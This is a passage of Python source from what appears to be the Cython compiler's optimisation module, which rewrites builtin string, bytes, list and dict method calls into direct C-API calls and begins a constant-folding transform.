if slot_func_cname:
cython_scope = self.context.cython_scope
PyTypeObjectPtr = PyrexTypes.CPtrType(
cython_scope.lookup('PyTypeObject').type)
pyx_tp_new_kwargs_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("type", PyTypeObjectPtr, None),
PyrexTypes.CFuncTypeArg("args", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("kwargs", PyrexTypes.py_object_type, None),
])
type_arg = ExprNodes.CastNode(type_arg, PyTypeObjectPtr)
if not kwargs:
kwargs = ExprNodes.NullNode(node.pos, type=PyrexTypes.py_object_type) # hack?
return ExprNodes.PythonCapiCallNode(
node.pos, slot_func_cname,
pyx_tp_new_kwargs_func_type,
args=[type_arg, args_tuple, kwargs],
is_temp=True)
else:
# arbitrary variable, needs a None check for safety
type_arg = type_arg.as_none_safe_node(
"object.__new__(X): X is not a type object (NoneType)")
utility_code = UtilityCode.load_cached('tp_new', 'ObjectHandling.c')
if kwargs:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_tp_new_kwargs", self.Pyx_tp_new_kwargs_func_type,
args=[type_arg, args_tuple, kwargs],
utility_code=utility_code,
is_temp=node.is_temp
)
else:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_tp_new", self.Pyx_tp_new_func_type,
args=[type_arg, args_tuple],
utility_code=utility_code,
is_temp=node.is_temp
)
### methods of builtin types
PyObject_Append_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("item", PyrexTypes.py_object_type, None),
],
exception_value="-1")
def _handle_simple_method_object_append(self, node, function, args, is_unbound_method):
"""Optimistic optimisation as X.append() is almost always
referring to a list.
"""
if len(args) != 2 or node.result_is_used:
return node
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_PyObject_Append", self.PyObject_Append_func_type,
args=args,
may_return_none=False,
is_temp=node.is_temp,
result_is_used=False,
utility_code=load_c_utility('append')
)
PyByteArray_Append_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("value", PyrexTypes.c_int_type, None),
],
exception_value="-1")
PyByteArray_AppendObject_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("bytearray", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("value", PyrexTypes.py_object_type, None),
],
exception_value="-1")
def _handle_simple_method_bytearray_append(self, node, function, args, is_unbound_method):
if len(args) != 2:
return node
func_name = "__Pyx_PyByteArray_Append"
func_type = self.PyByteArray_Append_func_type
value = unwrap_coerced_node(args[1])
if value.type.is_int or isinstance(value, ExprNodes.IntNode):
value = value.coerce_to(PyrexTypes.c_int_type, self.current_env())
utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
elif value.is_string_literal:
if not value.can_coerce_to_char_literal():
return node
value = value.coerce_to(PyrexTypes.c_char_type, self.current_env())
utility_code = UtilityCode.load_cached("ByteArrayAppend", "StringTools.c")
elif value.type.is_pyobject:
func_name = "__Pyx_PyByteArray_AppendObject"
func_type = self.PyByteArray_AppendObject_func_type
utility_code = UtilityCode.load_cached("ByteArrayAppendObject", "StringTools.c")
else:
return node
new_node = ExprNodes.PythonCapiCallNode(
node.pos, func_name, func_type,
args=[args[0], value],
may_return_none=False,
is_temp=node.is_temp,
utility_code=utility_code,
)
if node.result_is_used:
new_node = new_node.coerce_to(node.type, self.current_env())
return new_node
PyObject_Pop_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
])
PyObject_PopIndex_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("list", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("index", PyrexTypes.c_long_type, None),
])
def _handle_simple_method_list_pop(self, node, function, args, is_unbound_method):
return self._handle_simple_method_object_pop(
node, function, args, is_unbound_method, is_list=True)
def _handle_simple_method_object_pop(self, node, function, args, is_unbound_method, is_list=False):
"""Optimistic optimisation as X.pop([n]) is almost always
referring to a list.
"""
if not args:
return node
args = args[:]
if is_list:
type_name = 'List'
args[0] = args[0].as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error="PyExc_AttributeError",
format_args=['pop'])
else:
type_name = 'Object'
if len(args) == 1:
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py%s_Pop" % type_name,
self.PyObject_Pop_func_type,
args=args,
may_return_none=True,
is_temp=node.is_temp,
utility_code=load_c_utility('pop'),
)
elif len(args) == 2:
index = unwrap_coerced_node(args[1])
if is_list or isinstance(index, ExprNodes.IntNode):
index = index.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if index.type.is_int:
widest = PyrexTypes.widest_numeric_type(
index.type, PyrexTypes.c_py_ssize_t_type)
if widest == PyrexTypes.c_py_ssize_t_type:
args[1] = index
return ExprNodes.PythonCapiCallNode(
node.pos, "__Pyx_Py%s_PopIndex" % type_name,
self.PyObject_PopIndex_func_type,
args=args,
may_return_none=True,
is_temp=node.is_temp,
utility_code=load_c_utility("pop_index"),
)
return node
single_param_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_returncode_type, [
PyrexTypes.CFuncTypeArg("obj", PyrexTypes.py_object_type, None),
],
exception_value = "-1")
def _handle_simple_method_list_sort(self, node, function, args, is_unbound_method):
"""Call PyList_Sort() instead of the 0-argument l.sort().
"""
if len(args) != 1:
return node
return self._substitute_method_call(
node, function, "PyList_Sort", self.single_param_func_type,
'sort', is_unbound_method, args).coerce_to(node.type, self.current_env)
Pyx_PyDict_GetItem_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
])
def _handle_simple_method_dict_get(self, node, function, args, is_unbound_method):
"""Replace dict.get() by a call to PyDict_GetItem().
"""
if len(args) == 2:
args.append(ExprNodes.NoneNode(node.pos))
elif len(args) != 3:
self._error_wrong_arg_count('dict.get', node, args, "2 or 3")
return node
return self._substitute_method_call(
node, function,
"__Pyx_PyDict_GetItemDefault", self.Pyx_PyDict_GetItem_func_type,
'get', is_unbound_method, args,
may_return_none = True,
utility_code = load_c_utility("dict_getitem_default"))
Pyx_PyDict_SetDefault_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("key", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("default", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_safe_type", PyrexTypes.c_int_type, None),
])
def _handle_simple_method_dict_setdefault(self, node, function, args, is_unbound_method):
"""Replace dict.setdefault() by calls to PyDict_GetItem() and PyDict_SetItem().
"""
if len(args) == 2:
args.append(ExprNodes.NoneNode(node.pos))
elif len(args) != 3:
self._error_wrong_arg_count('dict.setdefault', node, args, "2 or 3")
return node
key_type = args[1].type
if key_type.is_builtin_type:
is_safe_type = int(key_type.name in
'str bytes unicode float int long bool')
elif key_type is PyrexTypes.py_object_type:
is_safe_type = -1 # don't know
else:
is_safe_type = 0 # definitely not
args.append(ExprNodes.IntNode(
node.pos, value=str(is_safe_type), constant_result=is_safe_type))
return self._substitute_method_call(
node, function,
"__Pyx_PyDict_SetDefault", self.Pyx_PyDict_SetDefault_func_type,
'setdefault', is_unbound_method, args,
may_return_none=True,
utility_code=load_c_utility('dict_setdefault'))
### unicode type methods
PyUnicode_uchar_predicate_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_predicate(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
if method_name == 'istitle':
# istitle() doesn't directly map to Py_UNICODE_ISTITLE()
utility_code = UtilityCode.load_cached(
"py_unicode_istitle", "StringTools.c")
function_name = '__Pyx_Py_UNICODE_ISTITLE'
else:
utility_code = None
function_name = 'Py_UNICODE_%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_predicate_func_type,
method_name, is_unbound_method, [uchar],
utility_code = utility_code)
if node.type.is_pyobject:
func_call = func_call.coerce_to_pyobject(self.current_env)
return func_call
_handle_simple_method_unicode_isalnum = _inject_unicode_predicate
_handle_simple_method_unicode_isalpha = _inject_unicode_predicate
_handle_simple_method_unicode_isdecimal = _inject_unicode_predicate
_handle_simple_method_unicode_isdigit = _inject_unicode_predicate
_handle_simple_method_unicode_islower = _inject_unicode_predicate
_handle_simple_method_unicode_isnumeric = _inject_unicode_predicate
_handle_simple_method_unicode_isspace = _inject_unicode_predicate
_handle_simple_method_unicode_istitle = _inject_unicode_predicate
_handle_simple_method_unicode_isupper = _inject_unicode_predicate
PyUnicode_uchar_conversion_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ucs4_type, [
PyrexTypes.CFuncTypeArg("uchar", PyrexTypes.c_py_ucs4_type, None),
])
def _inject_unicode_character_conversion(self, node, function, args, is_unbound_method):
if is_unbound_method or len(args) != 1:
return node
ustring = args[0]
if not isinstance(ustring, ExprNodes.CoerceToPyTypeNode) or \
not ustring.arg.type.is_unicode_char:
return node
uchar = ustring.arg
method_name = function.attribute
function_name = 'Py_UNICODE_TO%s' % method_name.upper()
func_call = self._substitute_method_call(
node, function,
function_name, self.PyUnicode_uchar_conversion_func_type,
method_name, is_unbound_method, [uchar])
if node.type.is_pyobject:
func_call = func_call.coerce_to_pyobject(self.current_env)
return func_call
_handle_simple_method_unicode_lower = _inject_unicode_character_conversion
_handle_simple_method_unicode_upper = _inject_unicode_character_conversion
_handle_simple_method_unicode_title = _inject_unicode_character_conversion
PyUnicode_Splitlines_func_type = PyrexTypes.CFuncType(
Builtin.list_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("keepends", PyrexTypes.c_bint_type, None),
])
def _handle_simple_method_unicode_splitlines(self, node, function, args, is_unbound_method):
"""Replace unicode.splitlines(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (1,2):
self._error_wrong_arg_count('unicode.splitlines', node, args, "1 or 2")
return node
self._inject_bint_default_argument(node, args, 1, False)
return self._substitute_method_call(
node, function,
"PyUnicode_Splitlines", self.PyUnicode_Splitlines_func_type,
'splitlines', is_unbound_method, args)
PyUnicode_Split_func_type = PyrexTypes.CFuncType(
Builtin.list_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("sep", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("maxsplit", PyrexTypes.c_py_ssize_t_type, None),
]
)
def _handle_simple_method_unicode_split(self, node, function, args, is_unbound_method):
"""Replace unicode.split(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (1,2,3):
self._error_wrong_arg_count('unicode.split', node, args, "1-3")
return node
if len(args) < 2:
args.append(ExprNodes.NullNode(node.pos))
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "-1")
return self._substitute_method_call(
node, function,
"PyUnicode_Split", self.PyUnicode_Split_func_type,
'split', is_unbound_method, args)
PyString_Tailmatch_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_bint_type, [
PyrexTypes.CFuncTypeArg("str", PyrexTypes.py_object_type, None), # bytes/str/unicode
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
],
exception_value = '-1')
def _handle_simple_method_unicode_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'unicode', 'endswith',
unicode_tailmatch_utility_code, +1)
def _handle_simple_method_unicode_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'unicode', 'startswith',
unicode_tailmatch_utility_code, -1)
def _inject_tailmatch(self, node, function, args, is_unbound_method, type_name,
method_name, utility_code, direction):
"""Replace unicode.startswith(...) and unicode.endswith(...)
by a direct call to the corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('%s.%s' % (type_name, method_name), node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
args.append(ExprNodes.IntNode(
node.pos, value=str(direction), type=PyrexTypes.c_int_type))
method_call = self._substitute_method_call(
node, function,
"__Pyx_Py%s_Tailmatch" % type_name.capitalize(),
self.PyString_Tailmatch_func_type,
method_name, is_unbound_method, args,
utility_code = utility_code)
return method_call.coerce_to(Builtin.bool_type, self.current_env())
PyUnicode_Find_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("direction", PyrexTypes.c_int_type, None),
],
exception_value = '-2')
def _handle_simple_method_unicode_find(self, node, function, args, is_unbound_method):
return self._inject_unicode_find(
node, function, args, is_unbound_method, 'find', +1)
def _handle_simple_method_unicode_rfind(self, node, function, args, is_unbound_method):
return self._inject_unicode_find(
node, function, args, is_unbound_method, 'rfind', -1)
def _inject_unicode_find(self, node, function, args, is_unbound_method,
method_name, direction):
"""Replace unicode.find(...) and unicode.rfind(...) by a
direct call to the corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('unicode.%s' % method_name, node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
args.append(ExprNodes.IntNode(
node.pos, value=str(direction), type=PyrexTypes.c_int_type))
method_call = self._substitute_method_call(
node, function, "PyUnicode_Find", self.PyUnicode_Find_func_type,
method_name, is_unbound_method, args)
return method_call.coerce_to_pyobject(self.current_env())
PyUnicode_Count_func_type = PyrexTypes.CFuncType(
PyrexTypes.c_py_ssize_t_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("end", PyrexTypes.c_py_ssize_t_type, None),
],
exception_value = '-1')
def _handle_simple_method_unicode_count(self, node, function, args, is_unbound_method):
"""Replace unicode.count(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (2,3,4):
self._error_wrong_arg_count('unicode.count', node, args, "2-4")
return node
self._inject_int_default_argument(
node, args, 2, PyrexTypes.c_py_ssize_t_type, "0")
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "PY_SSIZE_T_MAX")
method_call = self._substitute_method_call(
node, function, "PyUnicode_Count", self.PyUnicode_Count_func_type,
'count', is_unbound_method, args)
return method_call.coerce_to_pyobject(self.current_env())
PyUnicode_Replace_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("str", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("substring", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("replstr", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("maxcount", PyrexTypes.c_py_ssize_t_type, None),
])
def _handle_simple_method_unicode_replace(self, node, function, args, is_unbound_method):
"""Replace unicode.replace(...) by a direct call to the
corresponding C-API function.
"""
if len(args) not in (3,4):
self._error_wrong_arg_count('unicode.replace', node, args, "3-4")
return node
self._inject_int_default_argument(
node, args, 3, PyrexTypes.c_py_ssize_t_type, "-1")
return self._substitute_method_call(
node, function, "PyUnicode_Replace", self.PyUnicode_Replace_func_type,
'replace', is_unbound_method, args)
PyUnicode_AsEncodedString_func_type = PyrexTypes.CFuncType(
Builtin.bytes_type, [
PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
])
PyUnicode_AsXyzString_func_type = PyrexTypes.CFuncType(
Builtin.bytes_type, [
PyrexTypes.CFuncTypeArg("obj", Builtin.unicode_type, None),
])
_special_encodings = ['UTF8', 'UTF16', 'Latin1', 'ASCII',
'unicode_escape', 'raw_unicode_escape']
_special_codecs = [ (name, codecs.getencoder(name))
for name in _special_encodings ]
def _handle_simple_method_unicode_encode(self, node, function, args, is_unbound_method):
"""Replace unicode.encode(...) by a direct C-API call to the
corresponding codec.
"""
if len(args) < 1 or len(args) > 3:
self._error_wrong_arg_count('unicode.encode', node, args, '1-3')
return node
string_node = args[0]
if len(args) == 1:
null_node = ExprNodes.NullNode(node.pos)
return self._substitute_method_call(
node, function, "PyUnicode_AsEncodedString",
self.PyUnicode_AsEncodedString_func_type,
'encode', is_unbound_method, [string_node, null_node, null_node])
parameters = self._unpack_encoding_and_error_mode(node.pos, args)
if parameters is None:
return node
encoding, encoding_node, error_handling, error_handling_node = parameters
if encoding and isinstance(string_node, ExprNodes.UnicodeNode):
# constant, so try to do the encoding at compile time
try:
value = string_node.value.encode(encoding, error_handling)
except:
# well, looks like we can't
pass
else:
value = BytesLiteral(value)
value.encoding = encoding
return ExprNodes.BytesNode(
string_node.pos, value=value, type=Builtin.bytes_type)
if encoding and error_handling == 'strict':
# try to find a specific encoder function
codec_name = self._find_special_codec_name(encoding)
if codec_name is not None:
encode_function = "PyUnicode_As%sString" % codec_name
return self._substitute_method_call(
node, function, encode_function,
self.PyUnicode_AsXyzString_func_type,
'encode', is_unbound_method, [string_node])
return self._substitute_method_call(
node, function, "PyUnicode_AsEncodedString",
self.PyUnicode_AsEncodedString_func_type,
'encode', is_unbound_method,
[string_node, encoding_node, error_handling_node])
PyUnicode_DecodeXyz_func_ptr_type = PyrexTypes.CPtrType(PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("size", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
]))
_decode_c_string_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
])
_decode_bytes_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", PyUnicode_DecodeXyz_func_ptr_type, None),
])
_decode_cpp_string_func_type = None # lazy init
def _handle_simple_method_bytes_decode(self, node, function, args, is_unbound_method):
"""Replace char*.decode() by a direct C-API call to the
corresponding codec, possibly resolving a slice on the char*.
"""
if not (1 <= len(args) <= 3):
self._error_wrong_arg_count('bytes.decode', node, args, '1-3')
return node
# normalise input nodes
string_node = args[0]
start = stop = None
if isinstance(string_node, ExprNodes.SliceIndexNode):
index_node = string_node
string_node = index_node.base
start, stop = index_node.start, index_node.stop
if not start or start.constant_result == 0:
start = None
if isinstance(string_node, ExprNodes.CoerceToPyTypeNode):
string_node = string_node.arg
string_type = string_node.type
if string_type in (Builtin.bytes_type, Builtin.bytearray_type):
if is_unbound_method:
string_node = string_node.as_none_safe_node(
"descriptor '%s' requires a '%s' object but received a 'NoneType'",
format_args=['decode', string_type.name])
else:
string_node = string_node.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error="PyExc_AttributeError",
format_args=['decode'])
elif not string_type.is_string and not string_type.is_cpp_string:
# nothing to optimise here
return node
parameters = self._unpack_encoding_and_error_mode(node.pos, args)
if parameters is None:
return node
encoding, encoding_node, error_handling, error_handling_node = parameters
if not start:
start = ExprNodes.IntNode(node.pos, value='0', constant_result=0)
elif not start.type.is_int:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop and not stop.type.is_int:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
# try to find a specific encoder function
codec_name = None
if encoding is not None:
codec_name = self._find_special_codec_name(encoding)
if codec_name is not None:
decode_function = ExprNodes.RawCNameExprNode(
node.pos, type=self.PyUnicode_DecodeXyz_func_ptr_type,
cname="PyUnicode_Decode%s" % codec_name)
encoding_node = ExprNodes.NullNode(node.pos)
else:
decode_function = ExprNodes.NullNode(node.pos)
# build the helper function call
temps = []
if string_type.is_string:
# C string
if not stop:
# use strlen() to find the string length, just as CPython would
if not string_node.is_name:
string_node = UtilNodes.LetRefNode(string_node) # used twice
temps.append(string_node)
stop = ExprNodes.PythonCapiCallNode(
string_node.pos, "strlen", self.Pyx_strlen_func_type,
args=[string_node],
is_temp=False,
utility_code=UtilityCode.load_cached("IncludeStringH", "StringTools.c"),
).coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
helper_func_type = self._decode_c_string_func_type
utility_code_name = 'decode_c_string'
elif string_type.is_cpp_string:
# C++ std::string
if not stop:
stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
constant_result=ExprNodes.not_a_constant)
if self._decode_cpp_string_func_type is None:
# lazy init to reuse the C++ string type
self._decode_cpp_string_func_type = PyrexTypes.CFuncType(
Builtin.unicode_type, [
PyrexTypes.CFuncTypeArg("string", string_type, None),
PyrexTypes.CFuncTypeArg("start", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("stop", PyrexTypes.c_py_ssize_t_type, None),
PyrexTypes.CFuncTypeArg("encoding", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("errors", PyrexTypes.c_char_ptr_type, None),
PyrexTypes.CFuncTypeArg("decode_func", self.PyUnicode_DecodeXyz_func_ptr_type, None),
])
helper_func_type = self._decode_cpp_string_func_type
utility_code_name = 'decode_cpp_string'
else:
# Python bytes/bytearray object
if not stop:
stop = ExprNodes.IntNode(node.pos, value='PY_SSIZE_T_MAX',
constant_result=ExprNodes.not_a_constant)
helper_func_type = self._decode_bytes_func_type
if string_type is Builtin.bytes_type:
utility_code_name = 'decode_bytes'
else:
utility_code_name = 'decode_bytearray'
node = ExprNodes.PythonCapiCallNode(
node.pos, '__Pyx_%s' % utility_code_name, helper_func_type,
args=[string_node, start, stop, encoding_node, error_handling_node, decode_function],
is_temp=node.is_temp,
utility_code=UtilityCode.load_cached(utility_code_name, 'StringTools.c'),
)
for temp in temps[::-1]:
node = UtilNodes.EvalWithTempExprNode(temp, node)
return node
_handle_simple_method_bytearray_decode = _handle_simple_method_bytes_decode
def _find_special_codec_name(self, encoding):
try:
requested_codec = codecs.getencoder(encoding)
except LookupError:
return None
for name, codec in self._special_codecs:
if codec == requested_codec:
if '_' in name:
name = ''.join([s.capitalize()
for s in name.split('_')])
return name
return None
def _unpack_encoding_and_error_mode(self, pos, args):
null_node = ExprNodes.NullNode(pos)
if len(args) >= 2:
encoding, encoding_node = self._unpack_string_and_cstring_node(args[1])
if encoding_node is None:
return None
else:
encoding = None
encoding_node = null_node
if len(args) == 3:
error_handling, error_handling_node = self._unpack_string_and_cstring_node(args[2])
if error_handling_node is None:
return None
if error_handling == 'strict':
error_handling_node = null_node
else:
error_handling = 'strict'
error_handling_node = null_node
return (encoding, encoding_node, error_handling, error_handling_node)
def _unpack_string_and_cstring_node(self, node):
if isinstance(node, ExprNodes.CoerceToPyTypeNode):
node = node.arg
if isinstance(node, ExprNodes.UnicodeNode):
encoding = node.value
node = ExprNodes.BytesNode(
node.pos, value=BytesLiteral(encoding.utf8encode()),
type=PyrexTypes.c_char_ptr_type)
elif isinstance(node, (ExprNodes.StringNode, ExprNodes.BytesNode)):
encoding = node.value.decode('ISO-8859-1')
node = ExprNodes.BytesNode(
node.pos, value=node.value, type=PyrexTypes.c_char_ptr_type)
elif node.type is Builtin.bytes_type:
encoding = None
node = node.coerce_to(PyrexTypes.c_char_ptr_type, self.current_env())
elif node.type.is_string:
encoding = None
else:
encoding = node = None
return encoding, node
def _handle_simple_method_str_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'str', 'endswith',
str_tailmatch_utility_code, +1)
def _handle_simple_method_str_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'str', 'startswith',
str_tailmatch_utility_code, -1)
def _handle_simple_method_bytes_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytes', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytes_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytes', 'startswith',
bytes_tailmatch_utility_code, -1)
''' # disabled for now, enable when we consider it worth it (see StringTools.c)
def _handle_simple_method_bytearray_endswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'endswith',
bytes_tailmatch_utility_code, +1)
def _handle_simple_method_bytearray_startswith(self, node, function, args, is_unbound_method):
return self._inject_tailmatch(
node, function, args, is_unbound_method, 'bytearray', 'startswith',
bytes_tailmatch_utility_code, -1)
'''
### helpers
def _substitute_method_call(self, node, function, name, func_type,
attr_name, is_unbound_method, args=(),
utility_code=None, is_temp=None,
may_return_none=ExprNodes.PythonCapiCallNode.may_return_none):
args = list(args)
if args and not args[0].is_literal:
self_arg = args[0]
if is_unbound_method:
self_arg = self_arg.as_none_safe_node(
"descriptor '%s' requires a '%s' object but received a 'NoneType'",
format_args=[attr_name, function.obj.name])
else:
self_arg = self_arg.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error = "PyExc_AttributeError",
format_args = [attr_name])
args[0] = self_arg
if is_temp is None:
is_temp = node.is_temp
return ExprNodes.PythonCapiCallNode(
node.pos, name, func_type,
args = args,
is_temp = is_temp,
utility_code = utility_code,
may_return_none = may_return_none,
result_is_used = node.result_is_used,
)
def _inject_int_default_argument(self, node, args, arg_index, type, default_value):
assert len(args) >= arg_index
if len(args) == arg_index:
args.append(ExprNodes.IntNode(node.pos, value=str(default_value),
type=type, constant_result=default_value))
else:
args[arg_index] = args[arg_index].coerce_to(type, self.current_env())
def _inject_bint_default_argument(self, node, args, arg_index, default_value):
assert len(args) >= arg_index
if len(args) == arg_index:
default_value = bool(default_value)
args.append(ExprNodes.BoolNode(node.pos, value=default_value,
constant_result=default_value))
else:
args[arg_index] = args[arg_index].coerce_to_boolean(self.current_env())
unicode_tailmatch_utility_code = UtilityCode.load_cached('unicode_tailmatch', 'StringTools.c')
bytes_tailmatch_utility_code = UtilityCode.load_cached('bytes_tailmatch', 'StringTools.c')
str_tailmatch_utility_code = UtilityCode.load_cached('str_tailmatch', 'StringTools.c')
class ConstantFolding(Visitor.VisitorTransform, SkipDeclarations):
"""Calculate the result of constant expressions to store it in
``expr_node.constant_result``, and replace trivial cases by their
constant result.
General rules:
- We calculate float constants to make them available to the
compiler, but we do not aggregate them into a single literal
node to prevent any loss of precision.
- We recursively calculate constants from non-literal nodes to
make them available to the compiler, but we only aggregate
literal nodes at each step. Non-literal nodes are never merged
into a single node.
"""
def __init__(self, reevaluate=False):
"""
The reevaluate argument specifies whether constant values that were
previously computed should be recomputed.
"""
super(ConstantFolding, self).__init__()
self.reevaluate = reevaluate
def _calculate_const(self, node):
if (not self.reevaluate and
node.constant_result is not ExprNodes.constant_value_not_set):
return
# make sure we always set the value
not_a_constant = ExprNodes.not_a_constant
node.constant_result = not_a_constant
# check if all children are constant
children = self.visitchildren(node)
for child_result in children.values():
if type(child_result) is list:
for child in child_result:
if getattr(child, 'constant_result', not_a_constant) is not_a_constant:
return
elif getattr(child_result, 'constant_result', not_a_constant) is not_a_constant:
return
